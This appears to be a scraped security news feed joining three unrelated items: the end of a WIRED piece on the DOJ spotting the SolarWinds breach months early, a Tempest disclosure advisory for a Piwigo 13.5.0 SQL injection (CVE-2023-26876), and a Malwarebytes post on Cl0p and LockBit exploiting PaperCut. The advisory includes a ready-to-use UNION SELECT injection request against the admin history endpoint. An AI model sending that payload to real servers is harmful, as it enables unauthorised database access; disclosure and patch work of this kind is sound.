When asked why, when the company announced the supply-chain hack in December, it didn’t publicly disclose that it had been tracking an incident related to the SolarWinds campaign in a government network months earlier, a spokesperson noted only that “when we went public, we had identified other compromised customers.”

The incident underscores the importance of information-sharing among agencies and industry, something the Biden administration has emphasized. Although the DOJ had notified CISA, a spokesperson for the National Security Agency told WIRED that it didn’t learn of the early DOJ breach until January 2021, when the information was shared in a call among employees of several federal agencies.

That was the same month the DOJ—whose 100,000-plus employees span multiple agencies including the FBI, Drug Enforcement Agency, and US Marshals Service—publicly revealed that the hackers behind the SolarWinds campaign had possibly accessed about 3 percent of its Office 365 mailboxes. There are conflicting reports about whether this attack was part of the SolarWinds campaign or carried out by the same actors. Six months later, the department expanded on this and announced that the hackers had managed to breach email accounts of employees at 27 US Attorneys' offices, including ones in California, New York, and Washington, DC. 

In its latter statement, the DOJ said that to “encourage transparency and strengthen homeland resilience,” it wanted to provide new details, including that the hackers were believed to have had access to compromised accounts from about May 7 to December 27, 2020. And the compromised data included “all sent, received, and stored emails and attachments found within those accounts during that time.”

The investigators of the DOJ incident weren’t the only ones to stumble upon early evidence of the breach. Around the same time of the department’s investigation, security firm Volexity, as the company previously reported, was also investigating a breach at a US think tank and traced it to the organization’s Orion server. Later in September, the security firm Palo Alto Networks also discovered anomalous activity in connection with its Orion server. Volexity suspected there might be a backdoor on its customer’s server but ended the investigation without finding one. Palo Alto Networks contacted SolarWinds, as the DOJ had, but in that case as well, they failed to pinpoint the problem.

Senator Ron Wyden, an Oregon Democrat who has been critical of the government’s failure to prevent and detect the campaign in its early stages, says the revelation illustrates the need for an investigation into how the US government responded to the attacks and missed opportunities to halt it.

“Russia’s SolarWinds hacking campaign was only successful because of a series of cascading failures by the US government and its industry partners,” he wrote in an email. “I haven’t seen any evidence that the executive branch has thoroughly investigated and addressed these failures. The federal government urgently needs to get to the bottom of what went wrong so that in the future, backdoors in other software used by the government are promptly discovered and neutralized.“

DOJ Detected SolarWinds Breach Months Before Public Disclosure

Piwigo version 13.5.0 suffers from a remote SQL injection vulnerability.

=====[ Tempest Security Intelligence - ADV-03/2023  
]==========================

Piwigo - Version 13.5.0

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgments  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: improper Neutralization of Special Elements used in an SQL Command  
('SQL injection') [CWE-89] improper Neutralization of Special Elements used  
in an SQL Command ('SQL Injection')  
 * CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
 * CVE-2023-26876

=====[ Overview]========================================================  
 * System affected : Piwigo - Version 13.5.0  
 * Software Version : Version 13.5.0 (other versions may also be affected).  
 * Impact : Piwigo 13.5.0 is vulnerable to SQL injection via  
/filter_user_id parameter to the  
admin.php?page=history&filter_image_id=&filter_user_id endpoint. An  
attacker can exploit this by  
executing SQL injection code to retrieve sensitive (P1) information and  
performing unintended actions.

=====[ Detailed  
description]=================================================

An authenticated user could run SQLi commands in the application and  
retrieve sensitive information (P1) and database information. Using the  
endpoint  
http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To  
explore just execute the following request:

GET  
/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT  
%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--  
HTTP/1.1  
Host: localhost  
Cookie: pwg_id=cookies

Check the value contained in the *filter_image_id* variable at the request  
response.

=====[ Timeline of  
disclosure]===============================================

12/Fev/2023 - Responsible disclosure was initiated with the vendor.

17/Fev/2023 - Piwigo confirmed the issue;

08/Mar/2023 - CVE-2023-26876 was assigned and reserved.

09/Mar/2023 - The vendor fixed the vulnerability SQL Injection.

=====[ Thanks & Acknowledgments]========================================

 * fxo,ravs  
 * Henrique Arcoverde < henrique.arcoverde () tempest.com.br >  
 * Tempest Security Intelligence / Tempest's Pentest Team [3]

=====[ References ]=====================================================

[1][https://cwe.mitre.org/data/definitions/89.html]

[2][https://github.com/Piwigo/Piwigo/issues/1876]

[3][https://www.tempest.com.br|http://www.tempest.com.br/]

[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]

=====[ EOF ]===========================================================

--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

Piwigo 13.5.0 SQL Injection

Categories: News
Categories: Ransomware
Tags: PaperCut

Tags:  Cl0p

Tags:  LockBit

Vulnerabilities in PaperCut printing management are being used in ransomware attacks.



(Read more...)




The post LockBit and Cl0p ransomware gangs actively exploiting Papercut vulnerabilities appeared first on Malwarebytes Labs.

A few days ago we wrote about two vulnerabilities found in PaperCut application servers. As we noted, exploitation was fairly simple so there was some urgency to install the patches. My esteemed colleague Chris Boyd literally wrote:

> “Arbitrary code can be deployed, or even ransomware if that’s part of the attacker’s toolkit.”

As it turns out, there are already two flavors of ransomware preying on those that haven’t updated yet.

A Cl0p affiliate, branded as DEV-0950 by Microsoft has already incorporated the PaperCut exploits into its attacks. This affiliate has also been known to use the GoAnywhere zero-day that basically brought Cl0p back from the dead last month.

In a surprising turn of events for the ransomware landscape, Cl0p emerged as the most used ransomware in March 2023, coming out of nowhere to dethrone the usual frontrunner, LockBit.

Known ransomware attacks in March 2023, listed by gang

But don’t rule the habitual frontrunner LockBit out just yet. Microsoft Threat Intelligence said in a tweet that it's "monitoring other attacks also exploiting these vulnerabilities, including intrusions leading to Lockbit deployment.”

PaperCut is printing management software that works by intercepting print jobs as they pass into a print queue. It’s used by large companies, state organizations, and education institutes because it is compatible with all major printer brands and platforms. This makes a vulnerability, especially one that is as easy to exploit, a virtual goldmine for ransomware peddlers, and puts a bullseye on anyone that is running an unpatched server.

Both the underlying vulnerabilities have been addressed with patches. If you update your PaperCut application servers, you are no longer at risk. From the Updating FAQ:

*   Please follow your usual upgrade procedure. Additional links on the ‘Check for updates’ page (accessed through the **Admin interface > About > Version info > Check for updates**) will allow customers to download fixes for previous major versions which are still supported (e.g. 20.1.7 and 21.2.11) as well as the current version available.
*   If you are using PaperCut MF, we highly recommend following your regular upgrade process. Your PaperCut partner or reseller information can also be found on the ‘About’ tab in the PaperCut admin interface.

If you’re unable to upgrade, PaperCut advises the following:

*   Block all inbound traffic from external IPs to the web management port (port 9191 and 9192 by default)
*   Block all traffic inbound to the web management portal on the firewall to the server. Note: this will prevent lateral movement from internal hosts but management of the PaperCut service can only be performed on that asset.
*   Apply “Allow list” restrictions under **Options > Advanced > Security > Allowed site server IP addresses**. Set this to only allow the IP addresses of verified Site Servers on your network. Note this only addresses ZDI-CAN-19226 / PO-1219.

**How to avoid ransomware**

*   **Block common forms of entry**. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
*   **Detect intrusions**. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption**. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups**. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tag

#intel